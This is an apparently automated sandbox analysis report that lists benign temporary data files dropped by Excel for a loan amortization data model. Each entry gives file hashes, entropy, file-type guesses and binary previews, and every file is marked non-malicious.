                                                                                                MD5:7510B601C57906C211DBF3E592F4A787
                                                                                                SHA1:543FBA4A73E18D4EE3F105584A24BFE7A16CF69D
                                                                                                SHA-256:7E2D121942AF0A439A82AE3E72B1A174F958E9FDA83EF24823DF9818A233C844
                                                                                                SHA-512:78C6405884F362B893CF85AD1A42C3D3D4857FFD1B27BA29D08473B09241224D0272D2BD20D3B8D249F914C46F9157837CC30D7F5F9D38C4585B0C580198117D
                                                                                                Malicious:false
                                                                                                Preview:............x...{.................................................................................................................................`@(......p< ....b.`2..N....D#...J.V,-.....h5......z>?`P8$..G.r.l:.PQ.Z.^.Y.-.....bcr.|F..k......tu.......

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Loan.0.dim\21.Loan.Interest.dictionary

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:Matlab v4 mat-file (little endian) \377\377\377\377\377\377\377\377y, text, rows 4294967295, columns 16, imaginary
                                                                                                Category:dropped
                                                                                                Size (bytes):1008
                                                                                                Entropy (8bit):7.2569813919866135
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:wcGbLyFD8/a32tU7lDwSgPJ5nZw+WLGyq:lGqh8/C2GOPJ5nZw+WKy
                                                                                                MD5:A89BFF049C504CE1D8A67E088B1ED668
                                                                                                SHA1:B6B43B9E1D4936CDB6EEEE0DA43459169CDD1594
                                                                                                SHA-256:2458875CA28B0996E779BE02EC0970DBF4705E33320786C1819644B3BD5900E7
                                                                                                SHA-512:78A7A400FABB913C1BF6256CE9F3C2C0C458E890D9B98405203F6BA7B0EDC622FB41AC36B724AA07EBF9F82640FFC1C7F15D0BA61D511A3B61447B0BEE7E060E
                                                                                                Malicious:false
                                                                                                Preview:............@...............y.................F@d....F@qc.9.F@.....{F@.B.].VF@..t..1F@J.^.q.F@y>...E@......E@.yw...E@...Q0sE@..J..LE@..)..&E@Q.i.'.D@.....D@...y.D@...Q..D@....aD@..-#2:D@!..B.D@..1a$.C@......C@.Q.TZ.C@.A.(.pC@45.C.GC@...m..C@:>Tn..B@j.[...B@......B@h..B.xB@{U?g.NB@t.-E.$B@...".A@.W}F..A@.zq..A@D.2u.yA@Z...NA@.JP.K#A@8.....@@.0....@@G....@@..)..s@@G|.U}G@@..)...@@.U..L.?@...\X.?@...x.'?@.V..2.>@173..r>@0...b.>@.Q..Y.=@_....]=@...k..=@."....<@.l.+.E<@.8pS..;@e'..6.;@.o./*;@.-...:@..m..j:@"...z.:@D.+D..9@..eOxH9@..hF..8@..Y...8@...."8@..t..7@.w..[7@F....6@jY..J.6@.J/.q.6@,...!.5@..bV[c5@&./[..4@@./ig.4@.M..8/4@...m..3@.A.Gp_3@'.H...2@....2@YZ..-$2@+.SK .1@....O1@5Z....0@B.~..y0@k.7P..0@.L.].A/@.6 {.g.@me6...-@^".*..,@.9c..+@...H..*@.....*@k5.X.5)@.'...T(@v{..r'@GH....&@G...N.%@.....$@TE....#@....f."@xl.:.."@....&!@..b..; @*umK...@...d<..@.......@.#....@....-.@'.j..K.@H.J.kg.@gu....@-....0.@vg...Y.@....V..@M>..4..@..|.y.?..I....?l..s..?_RW.k..?

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Loan.0.dim\21.Loan.Payment Date (Month Index).0.idf

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:Sony PlayStation PSX image, 4-Bit, Pixel at (119,0) Size=56x0
                                                                                                Category:dropped
                                                                                                Size (bytes):208
                                                                                                Entropy (8bit):1.9456656521696833
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Fll/RUUHljT3/:b3
                                                                                                MD5:62BAAF4B99B9CFE0E5BED08D9CEC5929
                                                                                                SHA1:EF651F7277651BDD75CF45434C027E1ED2016C4C
                                                                                                SHA-256:F2BFF7550D9267B714A1A8EBDC9C375515C8C8D6F56550FE514037F8E9A06EC4
                                                                                                SHA-512:E61FBDD3D4D6800D83E15193397EB626372BAFACBACE2AA3816CFC1605ABB24EDC5357E6FD248A32838B6DFF0F390E4A5863AD11D7502AA35C5BDCF78B415150
                                                                                                Malicious:false
                                                                                                Preview:............w....................................................................................................................................2Tv...2Tv...2Tv...2Tv...2Tv...2Tv...2Tv...2Tv...2Tv...2Tv......

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Loan.0.dim\21.Loan.Payment Date (Month Index).dictionary

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:Matlab v4 mat-file (little endian) \377\377\377\377\377\377\377\377\014, numeric, rows 4294967295, columns 8, imaginary
                                                                                                Category:dropped
                                                                                                Size (bytes):88
                                                                                                Entropy (8bit):1.9356192331713595
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:BRF5ll/aad//Clvlllnl/bwl/W0l/D:79dXCl9vl/UFl/D
                                                                                                MD5:35A0B5521CE5C03975F9B086B409AB36
                                                                                                SHA1:760C29B59D320176807A22CCE26F1D17550EA1B0
                                                                                                SHA-256:2759A6489D196A9F6F4B08D379C21272E1A36ACFE0EAEDEAED4466828F2029A8
                                                                                                SHA-512:FCE43A0D2D55542E4F3E8DCB6902F9BC09C1BC5BB377EB6F1F97F4B0F858890DDA9F817CA21C78EBFEAC591D30512031A745CECF6141DECEBB3F6364FE465AE2
                                                                                                Malicious:false
                                                                                                Preview:............@...........................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Loan.0.dim\21.Loan.Payment Date (Month).0.idf

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:Sony PlayStation PSX image, 4-Bit, Pixel at (119,0) Size=56x0
                                                                                                Category:dropped
                                                                                                Size (bytes):208
                                                                                                Entropy (8bit):1.9456656521696833
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Fll/RUUHljT3/:b3
                                                                                                MD5:62BAAF4B99B9CFE0E5BED08D9CEC5929
                                                                                                SHA1:EF651F7277651BDD75CF45434C027E1ED2016C4C
                                                                                                SHA-256:F2BFF7550D9267B714A1A8EBDC9C375515C8C8D6F56550FE514037F8E9A06EC4
                                                                                                SHA-512:E61FBDD3D4D6800D83E15193397EB626372BAFACBACE2AA3816CFC1605ABB24EDC5357E6FD248A32838B6DFF0F390E4A5863AD11D7502AA35C5BDCF78B415150
                                                                                                Malicious:false
                                                                                                Preview:............w....................................................................................................................................2Tv...2Tv...2Tv...2Tv...2Tv...2Tv...2Tv...2Tv...2Tv...2Tv......

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Loan.0.dim\21.Loan.Payment Date (Month).dictionary

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:Matlab v4 mat-file (little endian) \377\377\377\377\377\377\377\377\014, sparse, rows 1, columns 8, imaginary
                                                                                                Category:dropped
                                                                                                Size (bytes):315
                                                                                                Entropy (8bit):2.0912843590848316
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:aNdXrlC4eelRgPc1g3llQl5yltieWRru:a/rlC4AjlK2ixr
                                                                                                MD5:5197B874D9E9A0A16A92BA196B75699C
                                                                                                SHA1:1A5319BCB5B5B06EFEAC4B0E2705A730F3EE6A70
                                                                                                SHA-256:4528E43614E0FB4ED2ED7F44CC736A956F149CF2A81CE2BD755AC28E786134BD
                                                                                                SHA-512:961F3AE287289912C19B8BB1683171F6AD43346FFD7B54E170D9946E792ED4884D5EBC303DB6CAF9529A0D31FFBC15A4BE70AD210921F963C695AADD7A0A638E
                                                                                                Malicious:false
                                                                                                Preview:............@.............................................................................0.......`.......J.a.n...F.e.b...M.a.r...A.p.r...M.a.y...J.u.n...J.u.l...A.u.g...S.e.p...O.c.t...N.o.v...D.e.c................................................................................. .......$.......(.......,.......

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Loan.0.dim\21.Loan.Payment Date (Quarter).0.idf

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:Sony PlayStation PSX image, 4-Bit, Pixel at (117,0) Size=24x0
                                                                                                Category:dropped
                                                                                                Size (bytes):176
                                                                                                Entropy (8bit):1.34921410570366
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Fll/RQ5EtpllmRQQQQQQM:bWsERQQQQQQM
                                                                                                MD5:CD78447E8C150CB7B69CC96F9DB5F334
                                                                                                SHA1:F5F707364BF0887EB86E1FDED647F0930950BAF0
                                                                                                SHA-256:909DB2ADC474A0EE598ECAC9B8CC5942AA67D229167CB2A0771664A45AB288FF
                                                                                                SHA-512:F9A3C14096A2BE551CC20222D38DC53EA5BF5FF68A54D3507788273DB968E37E338A448C307987B40A0F404CF1CB7CF83737923304E41EC31E97A53C1DAF0CA3
                                                                                                Malicious:false
                                                                                                Preview:............u...................................................................................................................................@..@..@..@..@..@..@..@..@..@....

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Loan.0.dim\21.Loan.Payment Date (Quarter).dictionary

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:Matlab v4 mat-file (little endian) \377\377\377\377\377\377\377\377\004, sparse, rows 1, columns 8, imaginary
                                                                                                Category:dropped
                                                                                                Size (bytes):195
                                                                                                Entropy (8bit):1.8818468619616826
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:/lslllt5ll/aaVt/lOtlelDllcenlzltllIlU/qLlXtSlWGxlR/1htlllPlAltFl:aNVtYKweCUgQWGj7rlO
                                                                                                MD5:6F1747CB374B298A95AC85503015C756
                                                                                                SHA1:FA8BF06CCA29B1A2A5914813E97634C76E9879B6
                                                                                                SHA-256:7304BC9A3140437E2F87B55840CDD1CEBC15D0AAA105761B2D72752015384C19
                                                                                                SHA-512:E7949004805A9D8C92AC91764C91A4B73BEA49BBFB02D180762D0A7854F4CFC313B8AE434CDA5DC74F31369FE24D8B4A2D5B3CF6576909A07DD9A72DEBF26E25
                                                                                                Malicious:false
                                                                                                Preview:............@.....................................................................................(.......Q.t.r.1...Q.t.r.2...Q.t.r.3...Q.t.r.4.................................................

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Loan.0.dim\21.Loan.Payment Date (Year).0.idf

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:Sony PlayStation PSX image, 4-Bit, Pixel at (120,0) Size=52x0
                                                                                                Category:dropped
                                                                                                Size (bytes):208
                                                                                                Entropy (8bit):1.9856570590492275
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Fll/RlynlXdlONuhHr5DXSEptfJ9:bwAuF5eErJ9
                                                                                                MD5:4BC02E2ECCD18C7D03D237919DD24072
                                                                                                SHA1:E06F27E5D93F4F27BE99BAFF4D8A037F10D0AA2F
                                                                                                SHA-256:ED8E39237A33452D4D06275E8E1E94F240870C0795748099F86D4A847B8213BA
                                                                                                SHA-512:BEA34DE1F2799D74B70A652A74DAAF425E233869B68536C8939B919A1851883528F74C7568F95E9CB6EA56B5FAFAD85C70BF1F004668395576ADDF946915D3FE
                                                                                                Malicious:false
                                                                                                Preview:............x...............................................................................................................................................""""""333333DDDDDDUUUUUUffffffwwwwww................

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Loan.0.dim\21.Loan.Payment Date (Year).dictionary

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:Matlab v4 mat-file (little endian) \377\377\377\377\377\377\377\377\013, sparse, rows 1, columns 8, imaginary
                                                                                                Category:dropped
                                                                                                Size (bytes):321
                                                                                                Entropy (8bit):1.9327164878649103
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:/lslllt5ll/aaamtlel8l6enlYll5lvlalFZlFYlllXlPXlFWlF0lVlVlUlfl/lW:aNNK06eeOlcl/1+likbuueXQ
                                                                                                MD5:2E9DC952123E81934AF43214C969D8E7
                                                                                                SHA1:C6D64E923E87BE685EC32448267081EFA5B5BEB2
                                                                                                SHA-256:ACA67F452DC253F902A5E3F62D49D6181D0FDF62784D5FCC7AC0FA2313639EBF
                                                                                                SHA-512:8352A57DAAA0019F82EECB3F5CCD1411FC70DFB4C6028194E73C55947563693DE44E8FE28AFCA11A546DB0C4A62345816F93C54CDF939A8679435F46831C9A7A
                                                                                                Malicious:false
                                                                                                Preview:............@.............................................................................7.......n.......2.0.2.5...2.0.2.6...2.0.2.7...2.0.2.8...2.0.2.9...2.0.3.0...2.0.3.1...2.0.3.2...2.0.3.3...2.0.3.4...2.0.2.4.........................................................................#.......(.......-.......2.......

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Loan.0.dim\21.Loan.Payment Date.0.idf

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:Sony PlayStation PSX image, 4-Bit, Pixel at (120,0) Size=12x0
                                                                                                Category:dropped
                                                                                                Size (bytes):344
                                                                                                Entropy (8bit):5.046589854425613
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:bVWmXFJzf1q+IrxVAWcHzcntEsZvfCp65gdSZm+4:pJzbxIrxaeEswpR
                                                                                                MD5:BC0437CFA35DCE2D28DAB8DE2AA58785
                                                                                                SHA1:3FD4570907178732787C9ED6BBA2F6DED7DE394C
                                                                                                SHA-256:32EF8D4E003379D5D51A3BA15C03EDC648F35B9033DAEC88EAD7CB26B80EBF2F
                                                                                                SHA-512:3397177E759E3241F9C0BB8FC18567FF9875FF1D4E0218982C00C3D343CB8B9F42FA4C41410C0804131E0E7B6E6A778AC41190BB7A47BE71A09C92098CCF18A7
                                                                                                Malicious:false
                                                                                                Preview:............x......................................................................................................................................Z.....@.. .0.O........A #.$`...)..-...C3S.7....<.@).GdF.$J....O..SZ.xuY.E]....bL.f...vl.Fp".A.v|.y...g..H.R.q.......i.E9..........:z.vJ........L.j...K......>..|.....l...1..n......n.D.........

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Loan.0.dim\21.Loan.Payment.0.idf

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:Sony PlayStation PSX image, 4-Bit, Pixel at (120,0) Size=16x0
                                                                                                Category:dropped
                                                                                                Size (bytes):152
                                                                                                Entropy (8bit):0.34191181872988474
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Fllwlltcl:R
                                                                                                MD5:C1C2835D23ADA785A5B5D092D0A0A4F1
                                                                                                SHA1:B18F1C269FE56E8BEE602F60690033650DC0C329
                                                                                                SHA-256:1085F2BA46BC19939AE47FE6535CFD43C8B268E3BDC5E0392076594A1ECA524B
                                                                                                SHA-512:C72B6E423475D855A619C571F963261D89106D9425363ACB6AC35C258E7E1E82B221EA32C771A74EAB9AC7DCCD011BAEC658FCC8FBC9E19713C2E8DF304F4725
                                                                                                Malicious:false
                                                                                                Preview:............x...........................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Loan.0.dim\21.Loan.Payment.dictionary

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:Matlab v4 mat-file (little endian) \377\377\377\377\377\377\377\377\002, text, rows 4294967295, columns 16, imaginary
                                                                                                Category:dropped
                                                                                                Size (bytes):56
                                                                                                Entropy (8bit):2.3747429956842208
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:b8H/ull/RTnlDwallX:b8H2lpRTxwq
                                                                                                MD5:EA4A39D272E86C36E76C3C71C374A1AE
                                                                                                SHA1:74C90FE028A7279A7924BB208EDC8FEBE3FCBC98
                                                                                                SHA-256:FC0CB0C51471BFCCC0725CC478D232C4B7C4BF2EDA48DA0C0ABD370B77739DC6
                                                                                                SHA-512:7E7E049609B308ED3377AD22AEDC73F411BAAAADD24F68475BA423A7A2B4E5C53FD0D0F659F4CA8F1435E8327021A39301DC079E9F1E9A3EF87FDE21F9BBBD1D
                                                                                                Malicious:false
                                                                                                Preview:............@............................7...![@........

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Loan.0.dim\21.Loan.Pmt No.0.idf

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:Sony PlayStation PSX image, 4-Bit, Pixel at (120,0) Size=492x0
                                                                                                Category:dropped
                                                                                                Size (bytes):256
                                                                                                Entropy (8bit):3.9263495708028957
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Fll/RlE1Lldtz4T/7Wk53gvyJI9aFmMhOh510PS6wj0qujt/n:bjTjW+3gvyJWWnhOhr3Hwquj1n
                                                                                                MD5:7510B601C57906C211DBF3E592F4A787
                                                                                                SHA1:543FBA4A73E18D4EE3F105584A24BFE7A16CF69D
                                                                                                SHA-256:7E2D121942AF0A439A82AE3E72B1A174F958E9FDA83EF24823DF9818A233C844
                                                                                                SHA-512:78C6405884F362B893CF85AD1A42C3D3D4857FFD1B27BA29D08473B09241224D0272D2BD20D3B8D249F914C46F9157837CC30D7F5F9D38C4585B0C580198117D
                                                                                                Malicious:false
                                                                                                Preview:............x...{.................................................................................................................................`@(......p< ....b.`2..N....D#...J.V,-.....h5......z>?`P8$..G.r.l:.PQ.Z.^.Y.-.....bcr.|F..k......tu.......

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Loan.0.dim\21.Loan.Pmt No.dictionary

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:Matlab v4 mat-file (little endian) \377\377\377\377\377\377\377\377y, sparse, rows 1, columns 8, imaginary
                                                                                                Category:dropped
                                                                                                Size (bytes):1837
                                                                                                Entropy (8bit):2.057850197243142
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:rXllePF1G5OAt+Bz9IMyd+G5GeUXAP/PfDyGyeyE48Q0Is1:r1lSQn+Bz9IMPG5nUYXXyozjz1
                                                                                                MD5:FA8B2FA5EADB29B97555FE5FF07716AE
                                                                                                SHA1:6EBA2987085F658FD0E889B7E5BA1ABC84487FE7
                                                                                                SHA-256:A252BE9320753A7C40C27AC7E972C7ADB78B0B3417048082A2E67C01B591758E
                                                                                                SHA-512:EDC5D0CFEEA7764CD213A625DCC68D1D4DDEDCBA55E779DBF1213416B5834F949B6D0AEF19037F3C06ED82FE82A3D835782E251233743F8B7AC57775743F959D
                                                                                                Malicious:false
                                                                                                Preview:............@...............y.........................................y...................u...............1...2...3...4...5...6...7...8...9...1.0...1.1...1.2...1.3...1.4...1.5...1.6...1.7...1.8...1.9...2.0...2.1...2.2...2.3...2.4...2.5...2.6...2.7...2.8...2.9...3.0...3.1...3.2...3.3...3.4...3.5...3.6...3.7...3.8...3.9...4.0...4.1...4.2...4.3...4.4...4.5...4.6...4.7...4.8...4.9...5.0...5.1...5.2...5.3...5.4...5.5...5.6...5.7...5.8...5.9...6.0...6.1...6.2...6.3...6.4...6.5...6.6...6.7...6.8...6.9...7.0...7.1...7.2...7.3...7.4...7.5...7.6...7.7...7.8...7.9...8.0...8.1...8.2...8.3...8.4...8.5...8.6...8.7...8.8...8.9...9.0...9.1...9.2...9.3...9.4...9.5...9.6...9.7...9.8...9.9...1.0.0...1.0.1...1.0.2...1.0.3...1.0.4...1.0.5...1.0.6...1.0.7...1.0.8...1.0.9...1.1.0...1.1.1...1.1.2...1.1.3...1.1.4...1.1.5...1.1.6...1.1.7...1.1.8...1.1.9...1.2.0.......y...........................................................................................................................!.......$.......'..

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Loan.0.dim\21.Loan.Principal.0.idf

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:Sony PlayStation PSX image, 4-Bit, Pixel at (120,0) Size=492x0
                                                                                                Category:dropped
                                                                                                Size (bytes):256
                                                                                                Entropy (8bit):3.9263495708028957
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Fll/RlE1Lldtz4T/7Wk53gvyJI9aFmMhOh510PS6wj0qujt/n:bjTjW+3gvyJWWnhOhr3Hwquj1n
                                                                                                MD5:7510B601C57906C211DBF3E592F4A787
                                                                                                SHA1:543FBA4A73E18D4EE3F105584A24BFE7A16CF69D
                                                                                                SHA-256:7E2D121942AF0A439A82AE3E72B1A174F958E9FDA83EF24823DF9818A233C844
                                                                                                SHA-512:78C6405884F362B893CF85AD1A42C3D3D4857FFD1B27BA29D08473B09241224D0272D2BD20D3B8D249F914C46F9157837CC30D7F5F9D38C4585B0C580198117D
                                                                                                Malicious:false
                                                                                                Preview:............x...{.................................................................................................................................`@(......p< ....b.`2..N....D#...J.V,-.....h5......z>?`P8$..G.r.l:.PQ.Z.^.Y.-.....bcr.|F..k......tu.......

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Loan.0.dim\21.Loan.Principal.dictionary

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:Matlab v4 mat-file (little endian) \377\377\377\377\377\377\377\377y, text, rows 4294967295, columns 16, imaginary
                                                                                                Category:dropped
                                                                                                Size (bytes):1008
                                                                                                Entropy (8bit):7.129210296528201
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:w87HSI+emVdgKEWpCF+rpnfBlXlDXTCp/cv/kQkHkBwZwZlpYr9P4+v:zSzFdXEUprXWyv8QkBZwZYrldv
                                                                                                MD5:63948E67DED5A1EEEA7C952171769070
                                                                                                SHA1:ED1B1A547EF52C4E9C7E9C5280641DB8D29CD538
                                                                                                SHA-256:928DBB4065F4576B65C4DFD0F084C3B4481FBD8256790EE0742C2203EAA9A796
                                                                                                SHA-512:66E165A240B8A168C4DA1A961DFF98DF954EC6B33C945D620463CDD65CC46CD0011DDF18A6DDABC78EBBAB0B80D0D0585232EF3A80BB92D003E4417F93DD599F
                                                                                                Malicious:false
                                                                                                Preview:............@...............y..............h.XO@....z}O@..t.l.O@.m...O@.,....O@....%.P@......P@v.....P@*...AP@.z...TP@.[.`.hP@N6.{V{P@R..+..P@.G....P@Y....P@2...9.P@?-....P@,D....P@-.*x..Q@#..1..Q@.(Y.,Q@.....@Q@..D_.UQ@..[uWiQ@...g.}Q@*..RK.Q@...R.Q@.N....Q@....n.Q@.9D.T.Q@..!VT.Q@ys*gl.R@.VG8.$R@....9R@Dz..IOR@..'O.dR@.rQDZzR@p.....R@..4D.R@q.~...R@...|..R@1d.9..R@.y....R@QE,.8.S@8..\.*S@.?.r.AS@H..WS@."`.anS@.i4...S@.NR...S@G#....S@...U5.S@.7..m.S@..G..S@...>0.T@.).'T@...`?T@...."WT@7,.S.oT@..e...T@jFC...T@.v..A.T@...u..T@.0'x..T@J.. ..U@B..'.U@9...1U@.Y?S.JU@.....cU@Xaz..|U@.d.#..U@.@..f.U@..(...U@.F.2g.U@.Uu...U@od.L..V@.={../V@O'.w.IV@...L.cV@-...>~V@.! (..V@)9.v&.V@..~...V@%aW...V@.!.k.W@.=.5l.W@2..~.9W@.0]..TW@.k..,pW@gSi.W@..Z]M.W@..@..W@.^...W@.q....W@......X@E...X3X@...&.OX@..c.DlX@.....X@..EI..X@."....X@%.g...X@.[.l..X@...0.Y@``.%.7Y@C..:UY@.....rY@z..O.Y@9.U..Y@..*...Y@....7.Y@\.(!..Z@..{".(Z@v.t..FZ@..!.eZ@.u..Z@...C.Z@)..&..Z@...r.Z@a....[@

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Loan.0.dim\21.Loan.RowNumber.0.idf

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:Sony PlayStation PSX image, 4-Bit, Pixel at (360,0) Size=0x0
                                                                                                Category:dropped
                                                                                                Size (bytes):144
                                                                                                Entropy (8bit):0.36138058918125576
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Fll/R:b
                                                                                                MD5:64AB28E86840B315BDE94221AEF0AFA8
                                                                                                SHA1:2C85AB6D9BF1B19B54A03E29989AF9D8963DA19F
                                                                                                SHA-256:6C59C0DFBCB66E9D26AD9D6C2066B38505741686F15EC3852C207231BC686336
                                                                                                SHA-512:4693E83D5FD21A958428C7414D98D550BB1CFD99E2761C12E7610C0A85ED9621137486F0A079378AC09266B2863AF19FC21BB0DFE3CC76BCDDFB5093BF090BF7
                                                                                                Malicious:false
                                                                                                Preview:............h...................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Loan.0.dim\H$Loan$Beginning Balance.0.tbl.xml

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (8705), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):8705
                                                                                                Entropy (8bit):5.141793076541248
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:lIMckwYWKzDUTnKjivTnKjBD4FrTWWKzDUTnKjivTnKjBDcFrhN:EK4KWKWVK4KWKaD
                                                                                                MD5:0D26F96005DD569B3D93E11029160EBE
                                                                                                SHA1:D14A0DF692FA929FCEBD89C78FA3563B8B7B3083
                                                                                                SHA-256:A8C8036C5E321AEFB3DE0938D400C08EEDCBA1748467A16B5B2CB3D0F060019F
                                                                                                SHA-512:4AA004A1D20EC26F8790103399391CB1BC2408748409889DE6F484A31F0C22A399E63C656BBE542BFDE28FACA470DFFA93B98D745780DAC7A0254AD96BFAC538
                                                                                                Malicious:false
